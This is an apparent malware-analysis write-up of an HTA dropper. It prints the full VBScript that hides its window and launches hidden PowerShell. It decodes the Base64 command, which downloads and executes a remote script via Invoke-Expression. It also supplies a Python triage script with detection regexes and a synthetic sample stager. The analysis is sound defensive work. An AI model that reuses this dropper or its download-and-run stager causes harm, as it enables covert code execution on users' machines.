Analysis of a Malicious HTA Dropper
In this article we will discuss how to analyze an HTA file. This one drops and downloads a PowerShell file, so we start by analyzing the HTA itself.
Sample SHA-256: ef985d6f8548cfe1c0055087c8c1fb1ea0a8a29ad64bc6e8fd8d318193e5ee97
Below is the entire malicious code, so that we can understand what it does:
<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Function var_func()
Dim var_shell
Set var_shell = CreateObject("Wscript.Shell")
var_shell.run "cmd /c powershell.exe -w 1 -NoProfile -InputFormat None -ExecutionPolicy Bypass -e aQBlAHgAIAAoACgATgBlAHcALQBPAGI", 0, true
End Function
var_func
</script>
<body>
</body>
</HEAD>
</HTML>
Code indicators:
1- <script language="VBScript">
2- Set var_shell = CreateObject("Wscript.Shell")
3- var_shell.run "cmd /c powershell.exe -w 1 -NoProfile -InputFormat None -ExecutionPolicy Bypass -e
These indicators show the attacker using a Wscript.Shell object to launch PowerShell from cmd, with the window hidden and the execution policy bypassed, and to pass it a Base64-encoded command via -e.
Let's use CyberChef to decode:
Decoded malicious PowerShell code:
iex ((New-Object System.Net.WebClient).DownloadString('http[://]185[.216.]68.35/win/[checking].ps1')).
The decoded command downloads a PowerShell script (checking.ps1) from that address and hands the downloaded text straight to iex (Invoke-Expression), so the second stage runs from memory rather than from a file on disk.
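The decoding step above is the same for every HTA dropper of this shape: PowerShell's -EncodedCommand value is Base64 over UTF-16LE text, so a generic decoder can replace the manual CyberChef step. The script below is an added example, not code from the article or from the sample; it extracts the -e argument from HTA text, decodes it, flags the same indicators listed above, and defangs any URL it finds. The truncated fragment from the article is decoded as-is (padding restored), while the full sample HTA is constructed here with a reserved .invalid host so nothing is ever fetched. The regex list of -EncodedCommand spellings and the indicator names are my assumptions.

```python
"""Static triage of an HTA dropper: find the PowerShell -EncodedCommand
argument, decode it the way PowerShell does (Base64 over UTF-16LE text) and
list the indicators seen in the article. Added example, not the article's code."""
import base64
import re

# PowerShell accepts "-e", "-ec", "-en", "-enc" and the full "-EncodedCommand"
# (assumption: the sample only shows "-e"). Requiring whitespace right after
# the switch keeps "-ExecutionPolicy" from matching.
ENCODED_ARG = re.compile(
    r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Patterns for the behaviours called out in the article's code indicators.
INDICATORS = {
    "vbscript_block": re.compile(r'<script[^>]*language\s*=\s*"?vbscript', re.I),
    "hidden_hta_window": re.compile(
        r"window\.(?:resizeto\s+0\s*,\s*0|moveto\s+-\d+)", re.I),
    "wscript_shell": re.compile(r'createobject\s*\(\s*"wscript\.shell"', re.I),
    "powershell_launch": re.compile(r"powershell(?:\.exe)?", re.I),
    "hidden_powershell_window": re.compile(r"-w(?:indowstyle)?\s+(?:1|hidden)", re.I),
    "execution_policy_bypass": re.compile(r"-executionpolicy\s+bypass", re.I),
    "encoded_command": ENCODED_ARG,
}

URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)


def decode_encoded_command(blob: str) -> str:
    """Decode a -EncodedCommand value. Restores '=' padding lost to truncation
    (as in the article's snippet) and drops a dangling odd byte."""
    blob = blob.strip()
    blob += "=" * (-len(blob) % 4)
    raw = base64.b64decode(blob)
    return raw.decode("utf-16-le", errors="ignore")


def defang(url: str) -> str:
    """Render a URL so it cannot be clicked by accident in a report."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def triage(hta_text: str) -> dict:
    """Return matched indicator names, decoded commands and defanged URLs."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(hta_text)]
    decoded = [decode_encoded_command(b) for b in ENCODED_ARG.findall(hta_text)]
    urls = [defang(u) for cmd in decoded for u in URL_RE.findall(cmd)]
    return {"indicators": hits, "decoded_commands": decoded, "urls": urls}


# The truncated Base64 fragment exactly as printed in the article.
ARTICLE_FRAGMENT = "aQBlAHgAIAAoACgATgBlAHcALQBPAGI"

# Constructed sample (not the real dropper): same structure as the article's
# HTA, but the stager points at a reserved .invalid host.
SAMPLE_COMMAND = ("iex ((New-Object System.Net.WebClient)"
                  ".DownloadString('http://example.invalid/win/stage2.ps1'))")
SAMPLE_B64 = base64.b64encode(SAMPLE_COMMAND.encode("utf-16-le")).decode()
SAMPLE_HTA = f'''<HTML><HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set var_shell = CreateObject("Wscript.Shell")
var_shell.run "cmd /c powershell.exe -w 1 -NoProfile -ExecutionPolicy Bypass -e {SAMPLE_B64}", 0, true
</script></HEAD><BODY></BODY></HTML>'''

if __name__ == "__main__":
    print("article fragment decodes to:", repr(decode_encoded_command(ARTICLE_FRAGMENT)))
    for key, value in triage(SAMPLE_HTA).items():
        print(f"{key}: {value}")
```

Run against a real file with `triage(open("sample.hta", encoding="utf-8", errors="ignore").read())`; the decoded command and the defanged URL are what you would put in the report, and the indicator names map directly onto detection content for HTA-spawned PowerShell.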